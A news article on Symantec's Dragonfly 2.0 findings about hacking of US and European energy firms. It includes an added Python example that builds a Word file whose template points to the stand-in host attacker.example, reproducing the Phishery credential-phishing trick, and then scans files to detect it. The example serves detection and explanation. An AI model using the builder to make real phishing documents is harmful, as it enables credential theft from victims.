Dragonfly Russian Hacker Group Gains Access To U.S. And European Energy Grids Including Nuclear Plants


If you thought putting Homer Simpson in charge of a nuclear power plant seemed like a scary proposition, well, you would be right. But sometimes truth is stranger (and in this case, scarier) than fiction. Such is the case with security outfit Symantec reporting that hackers have been targeting the energy sector in Europe and North America since at least 2011. And if that's not frightening enough, they have kicked up their efforts in the past couple of years and even managed to breach companies that manage nuclear facilities in the United States.

The group behind these attacks is known as Dragonfly, and Symantec calls its renewed campaign Dragonfly 2.0. Energy facilities are squarely in its sights. The sector has already seen what a successful attack looks like: disruptions to Ukraine's power system in 2015 and 2016, attributed to cyber attacks (though not to Dragonfly itself), led to power outages affecting hundreds of thousands of people. And in recent months there have been reports of attempted attacks on electricity grids in Europe.

Dragonfly (Image Source: Symantec)

"The Dragonfly group appears to be interested in both learning how energy facilities operate and also gaining access to operational systems themselves, to the extent that the group now potentially has the ability to sabotage or gain control of these systems should it decide to do so. Symantec customers are protected against the activities of the Dragonfly group," Symantec says.

While companies that employ Symantec's security solutions are supposedly protected against these threats, the bigger concern is what might happen if attackers are successful in taking over a nuclear facility or energy grid. At that point, it will not matter what type of security software anyone is running.

As with many intrusion campaigns, Dragonfly sometimes uses email and phishing schemes to get a foothold in a company's network. One method relies on an open-source toolkit called Phishery, which is built to steal a victim's credentials by way of a template injection attack: the Word document it generates does not carry an executable payload, but instead points at a remote template on an attacker-controlled server, so that opening the document makes Word fetch the template and prompt the user for a username and password, which are then captured by the attacker.
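The tell-tale artifact of the technique described above is a relationship entry inside the .docx package that points the document's attached template at an external URL. The following is an added example (not code from the article or from Symantec) that constructs a minimal .docx in memory with such an injected relationship and then scans it the way a mail gateway or triage script might; the domain attacker.example and the function names are assumptions for illustration.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# OOXML namespace and relationship type used for a document's attached template.
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
)

SETTINGS_XML = (
    '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
    'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
    '<w:attachedTemplate r:id="rId1"/></w:settings>'
)


def build_docx(template_target=None):
    """Constructed sample: a minimal .docx zip. When template_target is set, the
    attached-template relationship is rewritten to an External target, which is
    the Phishery-style credential-phishing trick (hypothetical URL supplied by caller)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        if template_target is not None:
            z.writestr("word/settings.xml", SETTINGS_XML)
            z.writestr(
                "word/_rels/settings.xml.rels",
                '<Relationships xmlns="%s"><Relationship Id="rId1" Type="%s" '
                'Target="%s" TargetMode="External"/></Relationships>'
                % (RELS_NS, ATTACHED_TEMPLATE, template_target),
            )
    return buf.getvalue()


def find_remote_templates(docx_bytes):
    """Scan every .rels part in the package and return (part, target, scheme)
    for each attached-template relationship that resolves outside the file.
    http(s) targets are the classic credential prompt; UNC/file targets are
    worth flagging too because they can leak NTLM hashes on open."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter("{%s}Relationship" % RELS_NS):
                if rel.get("TargetMode") != "External":
                    continue
                if rel.get("Type") != ATTACHED_TEMPLATE:
                    continue
                target = rel.get("Target", "")
                scheme = urlparse(target).scheme or ("unc" if target.startswith("\\\\") else "")
                hits.append((name, target, scheme))
    return hits


if __name__ == "__main__":
    clean = build_docx()
    phish = build_docx("http://attacker.example/template.dotx")
    print("clean:", find_remote_templates(clean))
    print("injected:", find_remote_templates(phish))
```

A benign document normally has no External attached-template relationship at all, so any hit is a strong signal; a production scanner would also walk the other .rels parts for External targets of other relationship types, since the same zip-and-XML inspection covers them.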

In addition to leveraging email, Symantec says the attackers have also used watering hole attacks to collect login credentials. This works by compromising websites that are likely to be visited by people working in the energy sector, so that the credentials they enter are captured. In one instance, a visit to one of the compromised servers resulted in Backdoor.Goodor being installed on the victim's machine, giving the attacker remote access to that person's system.